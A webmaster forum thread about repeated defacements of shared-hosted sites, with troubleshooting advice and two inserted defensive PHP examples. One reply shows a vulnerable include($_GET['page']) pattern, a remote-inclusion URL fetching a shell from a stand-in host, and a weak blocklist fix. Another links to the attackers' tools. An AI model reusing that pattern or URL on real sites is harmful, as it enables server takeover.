Hacked! Need help ASAP.

Status
Not open for further replies.

MyOwnDemon

Face Rocker
Jan 28, 2007
3,529
27
48
Iowa
www.sitestomp.com
Hey guys,

Some fuckers keep hacking my server over and over again. I don't even know how they're getting in or what I'm looking for. They keep replacing all my index files with their own index file which displays a "Hacked By" page. They apparently got root access somehow, because they're going one by one and messing up about 20 sites in total.

I reupload everything, and thought it was fixed, deleted the SQL DB I thought was affected - but they just got in again.

If anyone can help me get this straightened out, please send me a PM or contact me on AIM. My screen name is Nokotone and I'm online right now.

Any help would be much appreciated. I'll give you the affected URLs and FTP access in if you need it.

Thanks much in advance for anyone who can help me out!

Edit: I already tried calling my host and got no help at all.
 


Well my first question is (and most obvious), have you changed your root password yet? If not, do it NOW.
 
do you use any scripts or cms's like wordpress etc. are you on shared server?
 
You should check for any new software that may have been uploaded to the root. There may be a rootkit or some sort of backdoor that was installed.
 
Mason: It is on a shared server. I use Wordpress, a few custom CMS I have had developed, and a few scripts that I bought. They could have exploited any of that. I deleted the entire site that I *think* they got access through (an arcade script), as well as the SQL DB attached to it.

frcreature: I didn't see any new folders or files when I was checking, but that doesn't mean they're not there. How do I check for that? I know little to nothing about technical stuff.

I also normally don't put my sites out there, but demontales [dot] com is one example of a site they got to. You can see their "hacked by" page there.
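One way to answer the "how do I check for new or changed files?" question when all you have is FTP and a PHP host, as an added example that is not from anyone in this thread: a small command-line PHP script that walks the site directory and lists files modified within the last N hours, plus any web files that contain the defacement marker text. The directory path, the time window and the marker string are assumptions; adjust them to your site.

```php
<?php
// Added example, not code from the thread. Run from the command line:
//   php find_changes.php /path/to/site 24
// Keep it outside the web root (or delete it after use) so it is not itself
// reachable from the web.

/**
 * Walk $root and return two sorted lists:
 *  - 'recent'  : files whose modification time is within the last $hours hours
 *  - 'flagged' : web text files whose content contains $marker (case-insensitive)
 */
function findRecentAndSuspicious(string $root, int $hours, string $marker = 'Hacked By'): array
{
    $cutoff  = time() - $hours * 3600;
    $recent  = [];
    $flagged = [];

    $iterator = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS)
    );

    foreach ($iterator as $file) {
        if (!$file->isFile()) {
            continue;
        }
        $path = $file->getPathname();

        // Note: an attacker can reset mtime with touch(), so treat an empty
        // 'recent' list as "nothing obvious", not as proof the site is clean.
        if ($file->getMTime() >= $cutoff) {
            $recent[] = $path;
        }

        // Only scan the file types a defacement page would be written in,
        // and skip anything unusually large to keep the scan quick.
        $ext = strtolower($file->getExtension());
        if (in_array($ext, ['php', 'html', 'htm', 'js'], true) && $file->getSize() < 2000000) {
            $content = file_get_contents($path);
            if ($content !== false && stripos($content, $marker) !== false) {
                $flagged[] = $path;
            }
        }
    }

    sort($recent);
    sort($flagged);
    return ['recent' => $recent, 'flagged' => $flagged];
}

if (PHP_SAPI === 'cli') {
    $root  = $argv[1] ?? '.';
    $hours = (int) ($argv[2] ?? 24);
    $result = findRecentAndSuspicious($root, $hours);

    printf("Files modified in the last %d hours under %s:\n", $hours, $root);
    foreach ($result['recent'] as $p) {
        echo "  $p\n";
    }
    echo "Files containing the defacement marker:\n";
    foreach ($result['flagged'] as $p) {
        echo "  $p\n";
    }
}
```

Files that turn up in the first list but that you did not upload yourself (especially .php files in upload or image directories) are what frcreature means by a backdoor; compare them against a clean copy of the site rather than trusting timestamps alone.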
 
You might have gotten hacked with the same technique that happened to me a few years ago. My site structure was this:

site.com/index.php?page=blah.html

index.php was my template and would include blah.html inside the template using:
<?php include($_GET['page']); ?>
Turns out this is really insecure and they can include something like this:

http://site.com/index.php?page=http://hackersite.com/shellscript.exe

They basically ran a linux command console on my server, allowing them to do pretty much anything.

I fixed it with this:
<?php
$page = $_GET['page'] ?? '';
// reject anything that looks like a remote URL or a directory traversal
if (stripos($page, "http") !== false || stripos($page, "ftp") !== false || strpos($page, "../") !== false) {
    $page = "security.php"; // log ip, send email
}
include($page);
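The filter above works by listing strings to reject. An alternative that does not depend on guessing every bad input is to list the pages that are allowed and refuse everything else, so the request value is only ever used as a lookup key and never reaches include() directly. Added example, not Bubbles' code or anything from the thread; the page names, file paths and the resolvePage() function are assumptions.

```php
<?php
// Added example (not from the thread): allowlist-based replacement for
// include($_GET['page']). A value such as "http://hackersite.com/shellscript.exe"
// or "../something" is never a key in the map, so it is rejected before include().

// The only short names that may appear in ?page=, and the file each one loads.
const PAGE_ALLOWLIST = [
    'home'    => 'pages/home.html',
    'about'   => 'pages/about.html',
    'contact' => 'pages/contact.html',
];

/**
 * Map the requested short name to an absolute file path under $baseDir,
 * or return null when the request is not on the allowlist.
 */
function resolvePage(?string $requested, string $baseDir): ?string
{
    if ($requested === null || !isset(PAGE_ALLOWLIST[$requested])) {
        return null;
    }

    $real     = realpath($baseDir . DIRECTORY_SEPARATOR . PAGE_ALLOWLIST[$requested]);
    $realBase = realpath($baseDir);

    // Defense in depth: even a mistake in the map cannot escape the site directory.
    if ($real === false || $realBase === false
        || strpos($real, $realBase . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $real;
}

$requested = $_GET['page'] ?? 'home';
$page = resolvePage($requested, __DIR__);

if ($page === null) {
    // Log the rejected value with the client IP (the "log ip" step from the
    // original fix) and stop; do not include anything the user supplied.
    error_log(sprintf('rejected page request from %s: %s',
        $_SERVER['REMOTE_ADDR'] ?? '-', $requested));
    http_response_code(404);
    exit('Page not found');
}

include $page;
```

Adding a page means adding one line to PAGE_ALLOWLIST; nothing else needs to change, and there is no pattern list to keep up to date as new ways of writing a URL or path turn up.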
 
I was hacked into awhile back and kept having problems until I changed hosting companies. Recently I had a prob w/WP, but I upgraded and I'm OK now.

I was only making pennies a day back then and it really discouraged me. It sure slowed down the little progress I was making at the time. I didn't feel like working on any of it for awhile because I kept losing all my work.

The best to you and I hope it is resolved soon.
 
Bubbles - Yeah, thanks for the fix. :) First I have to figure out what site they got access through. There are a bunch of them on this hosting package. Got someone looking through the logs now.

Jan- Yeah, it's more than a few pennies. ;) Out of all the sites they could have picked to mess up, they got my moneymaker. Very frustrating.

Thanks for all the help so far, guys.
 
First things first, check your logs including FTP logs and try to get some info on them.
Then turn off your FTP service to see if that's how they're getting in. If the files are still getting changed, check your cPanel access, and so on. That'll help you figure out how they're getting root. Just kinda start narrowing it down and fix the problem.
 
You say it is shared hosting? So this is not your server, right? So the host changed the root password of the server - not you? If they are affecting all hosts on this shared server it is not just you that is at fault, it could be ANY one thing on all of these other sites. Not much you can do... it is up to your ISP to fix this. Anything you do will be futile, your site is just sitting in a directory on a server and they are probably just finding and replacing all index files with their own 'hacked by' page using a script.
 
For anyone who wants to protect themselves, he is being hacked by the following group and here are some links for their methods lol.

This is the site where the hackers are coming from, or at least it's one they own http://h4all.by.ru/ or maybe they just use it

Here are some files for that site http://h4all.by.ru/tools/SitEs/

The tricky thing is that they upload a new index.php file directly to your FTP account, so it's not a SQL type of injection.

I believe they are doing 1 of 2 things: 1, they are phishing for passwords, or 2, they are finding an exploit in an upload tool on the site.

Or they may have even found an exploit in the hosting provider's account, like what happened with DreamHost when they lost 3600 passwords.

I'm looking more into it, but this particular group has been busy; check out the Google link for them

Google

I have their index.php file which contains a decent song and a load of JavaScript, I'm going to rip my way through it and see if there are any clues to their methods.
 
Thanks for all the help Aequitas! You rock dude. It's back up and running for now, I'll have to wait and see if they hit it again. I'm guessing they will since they've already hit me twice now... I'll get a hold of you on AIM tomorrow.

And thanks to everyone else who IMed/PMed me. You guys are awesome. :)

And for the record, my host is 1and1. And wow, their customer support was absolutely ridiculous. The guy could barely speak English and when I asked him to transfer me to the abuse department, he said he couldn't. I just hung up. I wonder if the whole shared server got hit by these hackers.
 
Looks like they're based in Russia. We may need to book some tickets and kick some ass personally - Skull kid style. Unfortunately the only Russian phrases I can speak are "How are you", "My name is..." and "Thank You".
 
Those crazy Russians are pretty smart sometimes I tell you, just like the whole NASA catastrophe a few years back.

I'll tell you about it if you don't remember.

Apparently NASA spent 1 Million to create a pen that would write in space because normal ones won't work in low gravity and all. Anyway, after all the news releases someone asked the Russians how they solved the problem and they said it's simple, we use a pencil.
 
Apparently NASA spent 1 Million to create a pen that would write in space because normal ones won't work in low gravity and all. Anyway, after all the news releases someone asked the Russians how they solved the problem and they said it's simple, we use a pencil.
Not exactly, apparently that story is a myth and the Americans already knew they could use a pencil, but wanted to use pens in space.
 
I changed all my PWs, and then these fuckers just wiped out my shit again and replaced all my index files so I don't think they're getting in via FTP. This shit is getting so fucking annoying. My host, of course, is not helping me at all. As soon as I fix this, my next goal is moving all my sites to a different host.
 